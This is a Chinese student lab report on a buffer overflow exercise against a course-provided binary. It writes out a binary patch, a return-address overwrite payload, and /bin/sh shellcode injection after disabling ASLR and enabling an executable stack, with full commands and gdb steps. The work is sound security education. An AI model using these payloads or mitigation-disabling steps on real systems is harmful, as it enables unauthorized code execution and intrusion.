20222406 2024-2025-1 《网络与系统攻防技术》实验一实验报告
1.实验内容
本周深入学习了缓冲区溢出相关内容,收获颇丰。
一、理论知识学习
- 学习了缓冲区溢出的基本知识,包括汇编语言,了解了常见的指令如
mov(数据传送)、push(压栈)、pop(出栈)、call(调用函数)等的基本功能。同时,对 Windows 和 Linux 系统下的进程内存管理机制有了更深入的理解,包括用户态和内核态的区别等。 - 认识了栈和堆的概念。栈是一种具有后进先出特性的数据结构,用于存储函数调用的上下文信息等;堆则用于动态分配内存。
- 复习和加深了对计算机中缓冲区等知识的印象,明白了缓冲区溢出发生的原理,即当向缓冲区写入的数据超过其容量时,可能会覆盖相邻的内存区域,从而导致程序出现异常行为甚至被攻击者利用。
二、实践操作收获
- 对实验对象“pwn1”可执行文件进行了手工修改,通过改变程序执行流程,成功实现直接跳转到
getShell函数,深入理解了程序的执行逻辑和控制流。 - 利用
foo函数的缓冲区溢出漏洞(Bof),构造攻击输入字符串,覆盖返回地址,成功触发了getShell函数,亲身体验了缓冲区溢出攻击的过程。 - 尝试注入自己制作的 shellcode 并运行,进一步掌握了缓冲区溢出攻击的高级技术。
- 学会了在 Linux 环境下使用基本操作指令,如
cd(切换目录)、ls(列出目录内容)、chmod(修改文件权限)、cat(查看文件内容)等。 - 掌握了编译器和调试器的知识,能够在 Linux 下利用
gdb进行程序调试,包括设置断点、查看寄存器状态、跟踪程序执行流程等。 - 了解了反汇编的概念,并能够动手实现简单的十六进制编辑,通过反汇编分析程序的结构和功能,为理解和防范缓冲区溢出攻击提供了有力工具。
通过本周的学习和实践,不仅对缓冲区溢出攻击有了更全面的认识,也提高了自己的计算机安全意识和实践能力。
2.实验过程
2.1 直接修改程序机器指令,改变程序执行流程
2.1.1 下载目标文件pwn1,反汇编
点击查看2.1.1全部输入代码
cd /home/kali/Desktop/
ls
objdump -d pwn20222406 | more
首先,将学习通资料中的pwn1解压后拖入虚拟机中即可完成下载,
此处通过重命名即可修改文件名称,下图所示文件名称为pwn20222406。
随后先通过cd /home/kali/Desktop/进入桌面,
再输入ls查看文件是否存在,
最后输入命令objdump -d pwn20222406 | more查看代码:
通过观察,下图中白色高光区域的汇编指令call 8048491是说这条指令将调用位于地址8048491处的foo函数,
其对应机器指令为“e8 d7ffffff”,e8即跳转之意:
2.1.2 修改可执行文件
点击查看2.1.2全部输入代码
vi pwn20222406
:%!xxd
/d7ff
i
:%!xxd -r
:wq
输入命令vi pwn20222406:
即可出现如下内容:
随后,先按ESC键,再输入:%!xxd,将显示模式切换为16进制模式:
输入命令/d7ff查找要修改的内容:
再输入i进入插入模式,修改d7为c3:
按下ESC键退出插入模式,输入命令:%!xxd -r即可转换16进制为原格式:
再输入:wq保存并退出vi。
2.1.3 再反汇编查看call指令是否正确调用getShell
点击查看2.1.3全部输入代码
objdump -d pwn20222406 | more
./pwn20222406
还是输入命令objdump -d pwn20222406 | more即可发现call指令发生了变化:
这时输入命令./pwn20222406运行代码可以发现可以得到shell提示符:
2.2 通过构造输入参数,造成BOF攻击,改变程序执行流
2.2.1 反汇编,了解程序的基本功能
点击查看2.2.1全部输入代码
objdump -d pwn20222406 | more
首先,使用未被修改过的pwn文件,输入命令objdump -d pwn20222406 | more,
目标是触发函数getShell:
该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞,
这里读入字符串,但系统只预留了56字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址:
下面的call调用foo,同时在堆栈上压上返回地址值:80484ba:
2.2.2 确认输入字符串哪几个字符会覆盖到返回地址
点击查看2.2.2全部输入代码
gdb pwn20222406
1111111122222222333333334444444412345678
info r
首先输入命令gdb pwn20222406:
随后输入命令r:
随后输入字符串1111111122222222333333334444444412345678,再输入命令info r,
那1234那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码,
那只要把这四个字符替换为getShell的内存地址,输给pwn,pwn就会运行getShell:
2.2.3 确认用什么值来覆盖返回地址
点击查看2.2.3全部输入代码
break *0x804849d
info break
r
info r
getShell的内存地址,通过反汇编时可以看到,即0804847d,
接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,
还是输入11111111222222223333333344444444\x7d\x84\x04\x08,
相继输入命令break *0x804849d:
命令info break:
命令r:
命令info r:
对比之前eip 0x34333231 0x34333231,正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08
2.2.4 构造输入字符串
点击查看2.2.4全部输入代码
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
xxd input
(cat input; cat) | ./pwn20222406
ls
exit
ls
(perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"';cat) | ./pwn20222406
ls
exit
ls
由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件,
\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键,
输入命令perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input:
可以使用16进制查看指令xxd查看input文件的内容是否如预期,
输入命令xxd input:
然后将input的输入,通过管道符“|”,作为pwn的输入,
输入命令(cat input; cat) | ./pwn20222406,在其中输入ls:
随后输入命令(perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"';cat) | ./pwn20222406,在其中输入ls:
2.3 注入Shellcode并执行
2.3.1 准备一段Shellcode
shellcode就是一段机器指令(code),
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
所以这段机器指令被称为shellcode。
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
以下实践即使用shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\。
2.3.2 准备工作
点击查看2.3.2全部输入代码
execstack -s pwn20222406
execstack -q pwn20222406
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space
设置堆栈可执行,输入命令execstack -s pwn20222406,
随后输入execstack -q pwn20222406,
输入more /proc/sys/kernel/randomize_va_space,
关闭地址随机化,输入echo "0" > /proc/sys/kernel/randomize_va_space,
输入more /proc/sys/kernel/randomize_va_space:
2.3.3 构造要注入的payload
点击查看2.3.3全部输入代码
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
(cat input_shellcode;cat) | ./pwn20222406
ps -ef | grep pwn20222406
gdb
attach 13017
disassemble foo
break *0x080484ae
c
info r esp
x/16x 0xffffd31c
x/16x 0xffffd300
x/16x 0xffffd2fc
c
quit
perl -e 'print "A" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
xxd input_shellcode
(cat input_shellcode;cat) | ./pwn20222406
ls
Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr。
因为retaddr在缓冲区的位置是固定的,shellcode只能在它前后。
该buf足够放这个shellcode,结构为:nops+shellcode+retaddr。
nop一为是了填充,二是作为“着陆区/滑行区”。
输入命令perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode:
上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置,需要将其改为这段shellcode的地址,
特别提醒:最后一个字符不能是\x0a。
接下来我们来确定\x4\x3\x2\x1到底该填什么,
输入(cat input_shellcode;cat) | ./pwn20222406:
开启另一个终端,输入ps -ef | grep pwn20222406:
找到pwn的进程号是:13017
输入gdb后输入attach 13017调试这个进程:
输入disassemble foo通过设置断点,来查看注入buf的内存地址:
断在高光区域,这时注入的东西都大堆栈上了,ret结束,就跳到所覆盖的retaddr处。
输入break *0x080484ae:
在另外一个终端中按下回车,这就是前面为什么不能以\x0a来结束 input_shellcode的原因。
输入c:
输入info r esp:
相继输入x/16x 0xffffd31c、x/16x 0xffffd300、x/16x 0xffffd2fc:
输入c:
这个返回地址占位也是对的,
输入quit退出,
输入perl -e 'print "A" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode,
再输入xxd input_shellcode:
输入(cat input_shellcode;cat) | ./pwn20222406和ls:
3.问题及解决方案
- 问题1:在2.2.2处直接输入命令无法正常进行,显示信息为:
而在输入安装命令后还是无法正常安装:
- 问题1解决方案:输入命令
sudo apt-get update进行更新后再重新输入命令sudo apt install gdb:
待进度条到达100%时再输入命令sudo apt install gdb-minimal即可继续进行实验。 - 问题2:在2.3.2处直接输入命令无法正常进行,显示信息为:
- 问题2解决方案:输入命令
sudo apt-get install prelink,此时会显示:
有两种解决方法:
- 分别输入命令
sudo apt-get update和sudo apt-get upgrade安装execstack,但部分主机无法实现 - 从该网页下载文件
http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.deb,需要复制到浏览器下载,否则显示不安全
下载完成后,将文件拖拽至虚拟机,输入命令sudo dpkg -i execstack_0.0.20131005-1+b10_amd64.deb即可解压:
4.学习感悟、思考等
一、技术层面的收获
- 汇编语言与内存管理:学习了汇编语言中的常见指令,如
mov、push、pop、call等。 - 栈与堆的概念:明确了栈和堆在计算机内存中的不同作用。栈作为具有后进先出特性的数据结构,用于存储函数调用的上下文信息,其严格的进出规则保证了程序执行的有序性。而堆则用于动态分配内存,为程序的灵活性提供了支持。
- 缓冲区溢出原理与实践:通过手工修改可执行文件、构造攻击输入字符串以及注入 shellcode 等实践操作,亲身体验了缓冲区溢出攻击的过程。明白了当向缓冲区写入的数据超过其容量时,可能会覆盖相邻的内存区域,从而导致程序出现异常行为甚至被攻击者利用。
- 工具的掌握:熟练掌握了在 Linux 环境下的基本操作指令,如
cd、ls、chmod、cat等。
二、安全意识的提升
- 漏洞的危险性:缓冲区溢出漏洞是一种常见但极具危险性的安全漏洞。通过实验,我深刻认识到即使是一个看似简单的程序,也可能存在被攻击者利用的漏洞。这提醒我在编写程序时,要始终保持警惕,严格检查输入数据的长度和合法性,避免缓冲区溢出等安全问题的发生。
- 安全防护的重要性:在实验过程中,遇到了一些问题,如安装调试工具时出现的困难。这让我意识到,在实际的系统安全防护中,不仅要关注软件的功能实现,还要确保所使用的工具和环境的安全性。
- 持续学习的必要性:网络与系统攻防技术不断发展,新的漏洞和攻击手段层出不穷。通过这次实验,我认识到自己在计算机安全领域还有很多知识需要学习。只有不断更新自己的知识体系,关注最新的安全动态,才能更好地应对日益复杂的安全挑战。
总之,通过本次实验,我在技术能力和安全意识方面都有了很大的提升。我将继续努力学习,不断探索网络与系统攻防技术的奥秘,为保障网络空间安全贡献自己的一份力量。
参考资料
- 《0x11_MAL_逆向与Bof基础.md》
- 《Linux中“没有可用的软件包XX,但是它被其他软件包引用”的解决方法》
- 《关于找不到execstack的问题》
